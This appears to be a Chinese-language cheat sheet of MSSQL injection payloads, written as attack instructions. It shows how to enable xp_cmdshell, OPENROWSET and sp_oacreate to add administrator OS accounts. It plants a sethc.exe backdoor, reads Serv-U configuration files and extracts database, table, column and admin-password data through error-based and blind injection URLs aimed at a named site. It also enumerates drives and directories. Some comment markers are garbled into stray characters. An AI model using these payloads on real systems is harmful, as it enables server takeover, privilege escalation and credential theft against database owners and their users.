1.开启xp_cmdshell
EXEC sp_configure ’show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;�C
关闭xp_cmdshell
EXEC sp_configure ’show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 0;RECONFIGURE;�C
dbcc addextendedproc(”xp_cmdshell”,”xplog70.dll”);�C
(添加xplog70.dll)
2.开启’OPENROWSET’
exec sp_configure ’show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Ad Hoc Distributed Queries’,1;RECONFIGURE;�C
查询分析器里执行select * from openrowset(’microsoft.jet.oledb.4.0′,’
;database=c:\windows\system32\ias\ias.mdb’,
’select shell(”cmd.exe /c net user admin admin1234 /add”)’)来利用沙盘来添加个管理员
3.开启’sp_oacreate’
exec sp_configure ’show advanced options’, 1;RECONFIGURE;exec sp_configure ‘Ole Automation Procedures’,1;RECONFIGURE;�C
拷贝文件d:\windows\explorer.exe 至sethc.exe
declare @o int;exec sp_oacreate ’scripting.filesystemobject’, @o out ;exec sp_oamethod @o, ‘copyfile’,null,’d:\windows\explorer.exe’ ,’c:\sethc.exe’;
在查询分析器里执行
DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD
@shell,’run’,null, ‘C:\WINdows\system32\cmd.exe /c net user xcode xcode /add’
这段代码就是利用SP_OAcreate来添加一个xcode的系统用户 然后直接提升为管理员权限
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate ’scripting.filesystemobject’, @o out
exec sp_oamethod @o, ‘opentextfile’, @f out, ‘d:\Serv-U6.3\ServUDaemon.ini’, 1
exec @ret = sp_oamethod @f, ‘readline’, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, ‘readline’, @line out
end
这段代码就可以把ServUDaemon.ini里的配置信息全部显示出来
二.有显错,暴。
and 0<(select count(*) from master.dbo.sysdatabases);--折半法得到数据库个数
and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1);�C依次提交 dbid = 2.3.4… 得到更多的数据库名
and 0<(select count(*) name from employ.dbo.sysobjects where xtype='U');--折半法得到表个数(假设暴出库名employ)
and 0<(select top 1 name from employ.dbo.sysobjects where xtype='U');--爆出一个表名
假设暴出表名为"employ_qj"则在上面语句上加条件 and name not in ('employ_qj' 以此一直加条件...
and 0<(select top 1 name from syscolumns where id in (select id from sysobjects where type = 'u' and name = 'employ_qj'));--爆出一个列名
假设暴出字段名为"id"则在上面语句上加上条件 and name not is('id') 以此一直加条件....
或者
爆库语句
and (select top 1 isnull(cast([name] as nvarchar(500)),char(32))+char(124) from [master].[dbo].[sysdatabases] where dbid in (select top N dbid from [master].[dbo].[sysdatabases] order by dbid desc))=0--
爆表语句,somedb部份是所要列的数据库
and (select top 1 cast(name as varchar(200)) from (select top N name from somedb.sys.all_objects where type=char(85) order by name) t order by name desc)=0--
爆字段语句,爆表admin里user='admin'的密码段
And (Select Top 1 isNull(cast([password] as varchar(2000)),char(32))+char(124) From (Select Top N [password] From [somedb]..[admin] Where user='admin' order by [password]) T order by [password]Desc)=0--
三.无显错,盲注。
先说下SQL2005中的查询方法
select * from master.dbo.sysdatabases --查询数据库
select * from NetBook.dbo.sysobjects where xtype='u' --查询数据库NetBook里的表
select * from NetBook.dbo.syscolumns where id=object_id('book') --查询book表里的字段
判断权限:
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
and 1=(select IS_SRVROLEMEMBER('serveradmin'))
and 1=(select IS_SRVROLEMEMBER('setupadmin'))
and 1=(select IS_SRVROLEMEMBER('securityadmin'))
and 1=(select IS_SRVROLEMEMBER('diskadmin'))
and 1=(select IS_SRVROLEMEMBER('bulkadmin'))
and 1=(select IS_SRVROLEMEMBER('db_owner'))
盲注常规步骤:
判断库是否确实为MSSQL2005:
http://www.oldjun.com/oldjun.aspx?id=1 and substring((select @@version),22,4)='2005'
猜数据库名:
先猜dbid:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5)=1
根据dbid猜库名,先猜出长度:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=12)=1
再逐位猜:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and ascii(substring(name,1,1))>90)=1
猜表名(假设库名已经猜出为database):
可以尝试先看有没管理表:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where xtype=’u’ and name like ‘%admin%’)=1
猜第一个,先长度:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype=’u') and len(name)=9)=1
猜第一个表名,逐位猜:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype=’u') and ascii(substring(name,1,1))>90)=1
猜第二个表名(假设第一个为table1):
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype=’u’ and name not in (’table1′)) and ascii(substring(name,1,1))>90)=1
…
猜字段(假设表名已经猜出为table):
猜第一个字段:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database_db.dbo.syscolumns where id=object_id(’database.dbo.table’)) and ascii(substring(name,1,1))>90)=1
猜第二个(假设第一个为column1)
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database_db.dbo.syscolumns where id=object_id(’database.dbo.table’) and name not in (’column1′)) and ascii(substring(name,1,1))>90)=1
…
猜数据(假设要猜的字段为name):
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.table where name in (select top 1 name from database_db.dbo.table) and ascii(substring(name,1,1))>90)=1
…
四.其他一些语句(列目录)
1.查看驱动器
建表p(i为自动编号,a记录盘符类似”c:\”,b记录可用字节,其它省略)
;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));�C
;insert p exec xp_availablemedia;�C列出所有驱动器并插入表p
and (select count(*) from p)>3;�C折半法查出驱动器总数
and ascii(substring((select a from p where i=1),1,1))=67;�C折半法查出驱动器名(注asc(c)=67)
上面一般用于无显错情况下使用――-以此类推,得到所有驱动器名
and (select a from p where i=1)>3;�C报错得到第一个驱动器名
上面一般用于显错情况下使用――-以此类推,得到所有驱动器名
;drop table p;�C删除表p
2.查看目录
;create table pa(m nvarchar(255),i nvarchar(255));�C建表pa(m记录目录,i记录深度)\
;insert pa exec xp_dirtree ‘e:’;�C列出驱动器e并插入表pa
and (select count(*) from pa where i>0)>-1;�C折半法查出i深度
and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))>0;�C报错得到深度i=1的第一个目录名
上面一般用显错且目录名不为数字情况下使用――-(得到第二个目录把”top 0″换为”top 1″,换深度只换i就行)以此类推,得到e盘的所有目录
and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;�C折半法查出深度i=1的第一个目录名的长度
and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;�C折半法查出深度i=1的第一个目录名的第一个字符长度
上面一般用无显错情况下使用――-(得到第二个目录把”top 0″换为”top 1″,换深度只换i就行)以此类推,得到e盘的所有目录
;drop table pa;�C删除表pa
经过上面的方法就可得到服务器所有目录(这里为连接用户有读取权限目录)